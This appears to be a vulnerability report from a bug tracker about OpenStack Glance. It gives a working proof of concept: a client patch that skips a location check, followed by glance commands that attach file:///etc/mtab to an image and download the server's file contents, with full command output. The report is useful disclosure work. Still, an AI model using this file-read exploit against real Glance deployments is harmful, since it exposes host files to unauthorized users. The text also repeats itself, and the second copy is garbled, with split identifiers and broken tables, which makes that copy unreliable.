This can be exploited even when the server is configured with "show_multiple_locations = False".
(This is more serious because that is the default setting. )
2014-12-10 17:35:45.137 10953 DEBUG glance.common.config [-] show_multiple_locations = False log_opt_values /mnt/ubuntu/git/glance-juno-stable/glance/.tox/py27/local/lib/python2.7/site-packages/oslo/config/cfg.py:1992
Just patch the client (or send the equivalent request directly with curl):
$ git diff diff --git a/glanceclient/v2/images.py b/glanceclient/v2/images.py index 6ec9250..5037553 100644 --- a/glanceclient/v2/images.py +++ b/glanceclient/v2/images.py @@ -217,12 +217,10 @@ class Controller(object): :param metadata: Metadata associated with the location. :returns: The updated image """ - image = self._get_image_with_locations_or_fail(image_id) - url_list = [l['url'] for l in image.locations] - if url in url_list: - err_str = 'A location entry at %s already exists' % url - raise exc.HTTPConflict(err_str) - + #image = self._get_image_with_locations_or_fail(image_id) + #url_list = [l['url'] for l in image.locations] + #if url in url_list: + # err_str = 'A location entry at %s already exists' % url add_patch = [{'op': 'add', 'path': '/locations/-', 'value': {'url': url, 'metadata': metadata}}] self._send_image_update_request(image_id, add_patch)
$ glance image-create --disk-format raw --container-format bare +------------------+--------------------------------------+ | Property | Value | +------------------+--------------------------------------+ | checksum | None | | container_format | bare | | created_at | 2014-12-10T17:36:13 | | deleted | False | | deleted_at | None | | disk_format | raw | | id | ca95d79e-7d0e-46d7-9561-72dc5540ed98 | | is_public | False | | min_disk | 0 | | min_ram | 0 | | name | None | | owner | f68be3a5c2b14721a9e0ed2fcb750481 | | protected | False | | size | 0 | | status | queued | | updated_at | 2014-12-10T17:36:13 | | virtual_size | None | +------------------+--------------------------------------+
$ glance --os-image-api-version 2 location-add --url file:///etc/mtab ca95d79e-7d0e-46d7-9561-72dc5540ed98 +------------------+------------------------------------------------------+ | Property | Value | +------------------+------------------------------------------------------+ | container_format | bare | | created_at | 2014-12-10T17:36:13Z | | disk_format | raw | | file | /v2/images/ca95d79e-7d0e-46d7-9561-72dc5540ed98/file | | id | ca95d79e-7d0e-46d7-9561-72dc5540ed98 | | min_disk | 0 | | min_ram | 0 | | owner | f68be3a5c2b14721a9e0ed2fcb750481 | | protected | False | | schema | /v2/schemas/image | | size | 1144 | | status | active | | tags | [] | | updated_at | 2014-12-10T17:37:18Z | | visibility | private | +------------------+------------------------------------------------------+
$ glance image-download ca95d79e-7d0e-46d7-9561-72dc5540ed98 /dev/vda1 / ext4 rw 0 0 proc /proc proc rw,noexec,nosuid,nodev 0 0 sysfs /sys sysfs rw,noexec,nosuid,nodev 0 0 none /sys/fs/fuse/connections fusectl rw 0 0 none /sys/kernel/debug debugfs rw 0 0 none /sys/kernel/security securityfs rw 0 0 udev /dev devtmpfs rw,mode=0755 0 0 devpts /dev/pts devpts rw,noexec,nosuid,gid=5,mode=0620 0 0 tmpfs /run tmpfs rw,noexec,nosuid,size=10%,mode=0755 0 0
This can be exploited even when the server is configured with "show_multiple_ locations = False".
(This is more serious because that is the default setting. )
2014-12-10 17:35:45.137 10953 DEBUG glance. common. config [-] show_multiple_ locations = False log_opt_values /mnt/ubuntu/ git/glance- juno-stable/ glance/ .tox/py27/ local/lib/ python2. 7/site- packages/ oslo/config/ cfg.py: 1992
Just patch the client (or send the equivalent request directly with curl):
$ git diff v2/images. py b/glanceclient/ v2/images. py v2/images. py v2/images. py image_with_ locations_ or_fail( image_id) t(err_str) image_with_ locations_ or_fail( image_id)
'value' : {'url': url, 'metadata': metadata}}]
self. _send_image_ update_ request( image_id, add_patch)
diff --git a/glanceclient/
index 6ec9250..5037553 100644
--- a/glanceclient/
+++ b/glanceclient/
@@ -217,12 +217,10 @@ class Controller(object):
:param metadata: Metadata associated with the location.
:returns: The updated image
"""
- image = self._get_
- url_list = [l['url'] for l in image.locations]
- if url in url_list:
- err_str = 'A location entry at %s already exists' % url
- raise exc.HTTPConflic
-
+ #image = self._get_
+ #url_list = [l['url'] for l in image.locations]
+ #if url in url_list:
+ # err_str = 'A location entry at %s already exists' % url
add_patch = [{'op': 'add', 'path': '/locations/-',
$ glance image-create --disk-format raw --container-format bare ------- -----+- ------- ------- ------- ------- ------- --+ ------- -----+- ------- ------- ------- ------- ------- --+ 7d0e-46d7- 9561-72dc5540ed 98 | 1a9e0ed2fcb7504 81 | ------- -----+- ------- ------- ------- ------- ------- --+
+------
| Property | Value |
+------
| checksum | None |
| container_format | bare |
| created_at | 2014-12-10T17:36:13 |
| deleted | False |
| deleted_at | None |
| disk_format | raw |
| id | ca95d79e-
| is_public | False |
| min_disk | 0 |
| min_ram | 0 |
| name | None |
| owner | f68be3a5c2b1472
| protected | False |
| size | 0 |
| status | queued |
| updated_at | 2014-12-10T17:36:13 |
| virtual_size | None |
+------
$ glance --os-image- api-version 2 location-add --url file:///etc/mtab ca95d79e- 7d0e-46d7- 9561-72dc5540ed 98 ------- -----+- ------- ------- ------- ------- ------- ------- ------- ----+ ------- -----+- ------- ------- ------- ------- ------- ------- ------- ----+ 10T17:36: 13Z | ca95d79e- 7d0e-46d7- 9561-72dc5540ed 98/file | 7d0e-46d7- 9561-72dc5540ed 98 | 1a9e0ed2fcb7504 81 | 10T17:37: 18Z | ------- -----+- ------- ------- ------- ------- ------- ------- ------- ----+
+------
| Property | Value |
+------
| container_format | bare |
| created_at | 2014-12-
| disk_format | raw |
| file | /v2/images/
| id | ca95d79e-
| min_disk | 0 |
| min_ram | 0 |
| owner | f68be3a5c2b1472
| protected | False |
| schema | /v2/schemas/image |
| size | 1144 |
| status | active |
| tags | [] |
| updated_at | 2014-12-
| visibility | private |
+------
$ glance image-download ca95d79e- 7d0e-46d7- 9561-72dc5540ed 98 nosuid, nodev 0 0 nosuid, nodev 0 0 fuse/connection s fusectl rw 0 0 security securityfs rw 0 0 nosuid, gid=5,mode= 0620 0 0 nosuid, size=10% ,mode=0755 0 0
/dev/vda1 / ext4 rw 0 0
proc /proc proc rw,noexec,
sysfs /sys sysfs rw,noexec,
none /sys/fs/
none /sys/kernel/debug debugfs rw 0 0
none /sys/kernel/
udev /dev devtmpfs rw,mode=0755 0 0
devpts /dev/pts devpts rw,noexec,
tmpfs /run tmpfs rw,noexec,